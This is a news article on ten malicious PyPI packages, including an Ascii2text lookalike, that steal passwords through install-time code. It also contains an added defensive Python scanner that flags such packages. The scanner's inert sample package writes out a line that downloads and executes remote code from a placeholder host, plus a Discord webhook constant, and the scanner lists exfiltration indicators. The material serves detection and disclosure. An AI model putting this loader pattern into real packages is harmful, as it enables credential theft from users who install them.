Security researchers have discovered a set of 10 software packages containing malicious code in the Python Package Index (PyPI) repository, which turned out to be droppers for information-stealing malware.
The offending packages were designed to look like legitimate software and in some cases disguised as other popular packages on PyPI, such as Ascii2text.
According to Check Point researchers, the bad actors behind the malicious packages embedded malicious code into the package installation script so the malware would be installed on a victim’s machine unnoticed.
In the case of the fake package called Ascii2text, the malicious code was hidden in a file (__init__.py) imported by the installation script (setup.py).
“The code on the __init__.py file was responsible for downloading and executing a malicious script which searches for local passwords and uploads them using a discord web hook,” Check Point explained.
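The pattern described above (install-time code in setup.py importing a package module whose __init__.py fetches and executes a second stage and exfiltrates via a Discord webhook) can be spotted statically before a package is ever installed. The following scanner is an added example and is not code from Check Point or from the article; it parses an unpacked source distribution with Python's ast module and flags three things: setup.py importing one of the package's own modules, calls to download/execute primitives, and string constants that contain a Discord webhook path. The indicator lists are illustrative assumptions rather than an exhaustive ruleset, and the sample package at the bottom is constructed and inert (placeholder URLs) purely to exercise the checks.

```python
import ast
from dataclasses import dataclass

# Call targets that deserve a second look when they appear in install-time code.
# Assumption: this list is illustrative, not a complete indicator set.
SUSPICIOUS_CALLS = {
    "exec", "eval", "compile",
    "os.system", "os.popen", "subprocess.run", "subprocess.Popen", "subprocess.call",
    "urllib.request.urlopen", "requests.get", "requests.post",
    "base64.b64decode",
}
# Webhook URL fragments used as an exfiltration channel indicator.
SUSPICIOUS_STRING_FRAGMENTS = ("discord.com/api/webhooks", "discordapp.com/api/webhooks")


@dataclass
class Finding:
    filename: str
    lineno: int
    kind: str      # "local_import", "suspicious_call", "webhook_url" or "syntax_error"
    detail: str


def _dotted_name(node):
    """Render a Name/Attribute chain such as urllib.request.urlopen as a string."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def _local_imports(tree, top_level_dirs):
    """Imports in setup.py that resolve to the package's own directories."""
    hits = []
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for alias in node.names:
                root = alias.name.split(".")[0]
                if root in top_level_dirs:
                    hits.append((node.lineno, root))
        elif isinstance(node, ast.ImportFrom):
            root = (node.module or "").split(".")[0]
            if node.level > 0 or root in top_level_dirs:
                hits.append((node.lineno, root or "."))
    return hits


def scan_source(filename, source, top_level_dirs=frozenset()):
    """Scan one module's source text and return a list of Finding objects."""
    findings = []
    try:
        tree = ast.parse(source, filename=filename)
    except SyntaxError as e:
        return [Finding(filename, e.lineno or 0, "syntax_error", str(e.msg))]
    if filename.rsplit("/", 1)[-1] == "setup.py":
        for lineno, root in _local_imports(tree, top_level_dirs):
            findings.append(Finding(filename, lineno, "local_import", root))
    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            name = _dotted_name(node.func)
            if name in SUSPICIOUS_CALLS:
                findings.append(Finding(filename, node.lineno, "suspicious_call", name))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            for frag in SUSPICIOUS_STRING_FRAGMENTS:
                if frag in node.value:
                    findings.append(Finding(filename, node.lineno, "webhook_url", frag))
    return findings


def scan_package(files):
    """files maps a relative path inside the sdist to its source text."""
    top_level_dirs = {p.split("/")[0] for p in files if "/" in p}
    findings = []
    for path, src in files.items():
        findings.extend(scan_source(path, src, top_level_dirs))
    return sorted(findings, key=lambda f: (f.filename, f.lineno, f.kind))


# Constructed sample mimicking the layout the article describes; the URLs are
# placeholders and nothing here is executed, only parsed.
SAMPLE_PACKAGE = {
    "setup.py": (
        "from setuptools import setup\n"
        "import ascii2txt_lookalike  # pulls in __init__.py at install time\n"
        "setup(name='ascii2txt-lookalike', version='0.0.1', packages=['ascii2txt_lookalike'])\n"
    ),
    "ascii2txt_lookalike/__init__.py": (
        "import urllib.request\n"
        "WEBHOOK = 'https://discord.com/api/webhooks/PLACEHOLDER'\n"
        "exec(urllib.request.urlopen('https://example.invalid/stage2').read())\n"
    ),
}

if __name__ == "__main__":
    for f in scan_package(SAMPLE_PACKAGE):
        print(f"{f.filename}:{f.lineno} {f.kind}: {f.detail}")
```

A local import from setup.py is not malicious by itself (some projects read a version string that way), which is why the scanner reports it as a separate finding kind: the combination of a local import at install time with download-and-execute calls and a webhook string in the imported module is what warrants blocking the package in a pre-install review.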
Based on the evidence they gathered, the researchers believe that three of the 10 malicious packages (Pyg-utils, Pymocks and PyProto2) were developed by the same author behind the recent Pygrata campaign, whose aim was to harvest users’ AWS credentials.
Upon discovering the malicious packages, Check Point contacted the PyPI administrators and the rogue software was removed from the repository.